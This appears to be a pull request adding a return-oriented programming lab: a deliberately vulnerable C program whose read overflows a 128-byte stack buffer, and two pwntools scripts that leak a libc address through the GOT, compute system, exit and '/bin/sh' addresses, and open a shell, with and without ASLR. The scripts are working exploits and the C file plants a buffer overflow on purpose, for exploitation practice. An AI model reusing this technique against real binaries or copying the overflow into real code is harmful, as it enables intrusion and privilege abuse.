### PR TITLE
Rop exploit

### DIFF
--- a/rop/exploit.py
+++ b/rop/exploit.py
@@ -1,0 +1,54 @@
+#this was done with debugger gdb
+# gdb-peda plugin used
+
+from pwn import *
+context(arch="i686", os="linux")
+leak = "A"*140
+# ssize_t write(int fd, const void *buf, size_t count);
+#return addr 0x8048380 write@plt
+leak += "\x80\x83\x04\x08"
+#return address of vulnerable func #0x080484ab
+leak += "\xab\x84\x04\x08"
+#this used for testing
+#leak += "BBBB"
+#file descriptor stdount -1
+leak += "\x01\x00\x00\x00"
+#return addr 0804a00c read@GOT
+leak += "\x0c\xa0\x04\x08"
+# size, 4 bytes
+leak += "\x04\x00\x00\x00"
+print(leak)
+exploit = process("./rop3", shell=True)
+
+exploit.sendline(leak)
+read_addr = unpack(exploit.recv(4))
+print hex(read_addr)
+
+#check if we can read same address 2 times
+exploit.sendline(leak)
+read_addr2 = unpack(exploit.recv(4))
+print hex(read_addr2)
+
+# p read -> $1 = {<text variable, no debug info>} 0xb7eefb00 <read>
+# p system -> $2 = {<text variable, no debug info>} 0xb7e54da0 <__libc_system>
+# find "/bin" -> libc : 0xb7f75a0b ("/bin/sh")
+# p exit -> $3 = {<text variable, no debug info>} 0xb7e489d0 <__GI_exit>
+
+# p 0xb7eefb00 - 0xb7e54da0
+# p read - p system = 0x9ad60
+system_addr = read_addr - 0x9ad60
+
+# p 0xb7f75a0b - 0xb7eefb00
+# p (find "/bin") - p read = 0x85f0b
+binsh_addr = read_addr + 0x85f0b
+
+#p 0xb7eefb00 - 0xb7e489d0
+#p read - p exit = 0xa7130
+exit_addr = read_addr -  0xa7130
+
+print("system: %s " % hex(system_addr))
+print("binsh: %s " % hex(binsh_addr))
+
+shell = "A"*140 + pack(system_addr) + pack(exit_addr) + pack(binsh_addr)
+exploit.sendline(shell)
+exploit.interactive()

--- a/rop/exploit_rop_no_aslr.py
+++ b/rop/exploit_rop_no_aslr.py
@@ -1,0 +1,14 @@
+#!/usr/bin/env python
+from pwn import *
+leak = "A"*140
+#return address system
+leak += "\xa0\x4d\xe5\xb7"
+#return address exit
+leak += "\xd0\x89\xe4\xb7"
+#return address "bin/sh"
+leak += "\x0b\x5a\xf7\xb7"
+
+exploit = process("./rop3", shell=True)
+
+exploit.sendline(leak)
+exploit.interactive()

--- a/rop/rop3.c
+++ b/rop/rop3.c
@@ -1,0 +1,23 @@
+// gcc -fno-stack-protector -o rop3 rop3.c
+#undef _FORTIFY_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void vulnerable_function()  {
+  char buf[128];
+  read(STDIN_FILENO, buf,256);
+}
+
+void be_nice_to_people() {
+  // /bin/sh is usually symlinked to bash, which usually drops privs. Make
+  // sure we don't drop privs if we exec bash, (ie if we call system()).
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+}
+
+int main(int argc, char** argv) {
+      be_nice_to_people();
+  vulnerable_function();
+  write(STDOUT_FILENO, "Hello, World\n", 13);
+}


### PR DESCRIPTION
Return Oriented Programming Exploit.
- ASLR && NX enabled 
- ASLR disabled && NX enabled

ASLR - Address Space Layout Randomization
NX - No executable stack

Check by doing
1. cat /proc/sys/kernel/randomize_va_space
2. peda -> checksec